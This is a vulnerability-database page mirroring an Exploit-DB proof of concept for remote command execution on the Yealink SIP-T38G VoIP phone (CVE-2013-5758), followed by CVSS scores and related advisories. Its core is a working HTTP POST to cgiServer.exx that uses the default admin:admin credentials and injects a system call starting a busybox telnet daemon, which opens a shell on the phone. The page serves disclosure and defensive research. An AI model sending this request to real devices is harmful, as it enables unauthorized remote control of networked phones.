Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMr.Un1k0d3rEDB-ID:33741
HistoryJun 13, 2014 - 12:00 a.m.

Yealink VoIP Phone SIP-T38G - Remote Command Execution

2014-06-1300:00:00
Mr.Un1k0d3r
www.exploit-db.com
43

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

6.8

Confidence

Low

EPSS

0.048

Percentile

92.7%

JSON
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758

Description:

Using cgiServer.exx we are able to send OS command using the system
function.

POC:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("/bin/busybox%20telnetd%20start")



-- 
*Mr.Un1k0d3r** or 1 #*

Related

cve 3
exploitpack 4
exploitdb 3
packetstorm 4
seebug 4
nvd 3
prion 3
openvas 1
zdt 1
cvelist 3
cve
cve
CVE-2013-5759
2014-08-03 18:55:04
CVE-2013-5755
2014-07-16 14:19:02
CVE-2013-5758
2014-08-03 18:55:04
exploitpack
exploitpack
Yealink VoIP Phone SIP-T38G - Remote Command Execution
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Default Credentials
2014-06-13 00:00:00
exploitdb
exploitdb
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Default Credentials
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Local File Inclusion
2014-06-13 00:00:00
packetstorm
packetstorm
Yealink VoIP Phone SIP-T38G Remote Command Execution
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G Privilege Escalation
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G Default Credentials
2014-06-13 00:00:00
seebug
seebug
Yealink VoIP Phone SIP-T38G - Privileges Escalation
2014-07-01 00:00:00
Yealink VoIP Phone SIP-T38G - Remote Command Execution
2014-07-01 00:00:00
Yealink VoIP Phone SIP-T38G - Default Credentials
2014-07-01 00:00:00
nvd
nvd
CVE-2013-5759
2014-08-03 18:55:04
CVE-2013-5755
2014-07-16 14:19:02
CVE-2013-5758
2014-08-03 18:55:04
prion
prion
Design/Logic Flaw
2014-08-03 18:55:00
Hardcoded credentials
2014-07-16 14:19:00
Cross site request forgery (csrf)
2014-08-03 18:55:00
openvas
openvas
Yealink VoIP Phone SIP-T38G Multiple Vulnerabilities
2014-06-20 00:00:00
zdt
zdt
Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities
2014-06-14 00:00:00
cvelist
cvelist
CVE-2013-5759
2014-08-03 18:00:00
CVE-2013-5758
2014-08-03 18:00:00
CVE-2013-5755
2014-07-16 14:00:00

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

6.8

Confidence

Low

EPSS

0.048

Percentile

92.7%

JSON
Related for EDB-ID:33741
cve3exploitpack4exploitdb3packetstorm4seebug4nvd3prion3openvas1zdt1cvelist3